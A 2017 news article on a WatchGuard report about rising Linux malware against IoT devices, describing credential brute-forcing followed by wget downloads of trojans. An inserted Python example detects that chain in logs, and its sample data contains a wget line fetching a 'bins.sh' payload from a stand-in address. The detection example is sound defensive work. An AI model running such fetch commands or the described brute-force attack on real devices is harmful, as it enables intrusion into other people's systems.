Wednesday, 05 July 2017 09:13

Threats to Linux IoT devices on the rise


Malware detected by the security firm WatchGuard Technologies in the first quarter of 2017 indicated that there is a sharp rise in Linux threats directed against IoT devices.

The company's research, issued under the name Internet Security Report, looked at what was detected by installations of its software. It found that about 36% of the malware detected consisted of these Linux threats.

Many of these devices, which often use old versions of Linux, have a default username and password which users often do not bother to change. Logging in with these credentials — which are easy to find on the Web — gives root access to the device in question.

Corey Nachreiner, WatchGuard's chief technology officer, told iTWire that many of the Linux IoT infections started with someone simply scanning the Internet for devices listening on telnet or SSH ports.

"Then they try to brute force a user credential, or use default passwords. If they can brute force a Linux credential, then the automated attack usually just logs into the Linux device and then runs a script to wget a bunch of files, which are Linux tools and trojans," he said. Wget is a popular command-line program used to download files on Linux systems.

"In this scenario, that wget request would generate a Web request to download a file, and that's often how our gateway anti-virus would encounter those samples above and block them via HTTP."

Nachreiner said there were remote Linux vulnerabilities that attackers could use to gain control of a Linux system, and then leverage that control to download malware.

"There are other simple attacks (brute-forcing weak SSH credentials) that could allow an attacker to gain local access to a Linux machine, and then try to download his malware. Then there are many Web and email phishing or social engineering techniques, that could try to get a user to unknowingly download malware.

"With our GAV statistics, we can't say which of these the attacker is doing, but we can say that these Linux threats attempted to get to a device over the Web, and were blocked."

WatchGuard said its report was based on anonymised Firebox Feed data from more than 26,500 active WatchGuard UTM appliances worldwide, representing a small portion of its overall install base.
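The infection chain Nachreiner describes above (repeated password guesses, a successful login, then a wget download) can be looked for in a device's own logs. The following is an added example, not code from WatchGuard or from this article; the sshd lines are constructed in the usual OpenSSH syslog wording, while the `cmdlog` command-audit format, the thresholds and all addresses are assumptions made for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: sshd lines follow the usual OpenSSH syslog wording; the
# "cmdlog" lines are a hypothetical command-audit format invented for this example.
SAMPLE = """\
Jul  5 09:00:01 cam01 sshd[811]: Failed password for root from 203.0.113.7 port 40112 ssh2
Jul  5 09:00:02 cam01 sshd[812]: Failed password for admin from 203.0.113.7 port 40113 ssh2
Jul  5 09:00:03 cam01 sshd[813]: Failed password for root from 203.0.113.7 port 40114 ssh2
Jul  5 09:00:04 cam01 sshd[814]: Accepted password for root from 203.0.113.7 port 40115 ssh2
Jul  5 09:00:09 cam01 cmdlog[820]: user=root cmd=wget http://198.51.100.9/bins.sh
Jul  5 09:30:00 cam01 sshd[901]: Failed password for root from 192.0.2.44 port 5110 ssh2
Jul  5 10:15:00 cam01 sshd[950]: Accepted password for ops from 192.0.2.80 port 6001 ssh2
Jul  5 12:00:00 cam01 cmdlog[990]: user=ops cmd=wget http://198.51.100.20/update.tar
"""

LINE = re.compile(r"^(\w{3}\s+\d+ [\d:]{8}) (\S+) (\w+)\[\d+\]: (.*)$")
AUTH = re.compile(r"^(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) ")
CMD = re.compile(r"^user=(\S+) cmd=(wget\s.*)$")

def find_chains(text, min_failures=3, window=timedelta(seconds=60), year=2017):
    """Flag wget runs that closely follow a login preceded by failed guesses."""
    failures = {}   # (host, src_ip) -> timestamps of recent failed logins
    sessions = {}   # (host, user) -> (src_ip, login time) after a guessed password
    alerts = []
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        # Syslog timestamps carry no year, so one is supplied by the caller.
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        host, prog, msg = m.group(2), m.group(3), m.group(4)
        if prog == "sshd" and (a := AUTH.match(msg)):
            outcome, user, ip = a.groups()
            recent = [t for t in failures.get((host, ip), []) if ts - t <= window]
            if outcome == "Failed":
                failures[(host, ip)] = recent + [ts]
            elif len(recent) >= min_failures:
                sessions[(host, user)] = (ip, ts)   # login right after a burst of failures
        elif prog == "cmdlog" and (c := CMD.match(msg)):
            user, cmd = c.groups()
            ip, login = sessions.get((host, user), (None, None))
            if ip and ts - login <= window:
                alerts.append({"host": host, "src": ip, "user": user, "cmd": cmd})
    return alerts
```

On the constructed sample only the 203.0.113.7 sequence is reported; the later `ops` login has no preceding failures, so its wget is not flagged.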

Other findings in the report were that legacy anti-virus programs were failing to detect new malware at a higher rate. AV solutions had missed 38% of the total threats which WatchGuard's products detected in Q1, compared to 30% in Q4 2016, the company claimed.

The report also said that the cyber security battleground was shifting toward Web servers, with drive-by downloads and browser-based attacks dominating in the first quarter of 2017.

It found that attackers were still exploiting the Android StageFright flaw which first gained notoriety in 2015.

Attackers were found to be taking a break from hacking during the holidays, with the overall threat volume decreasing 52% in Q1 2017 compared to Q4 2016.




Sam Varghese


Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.


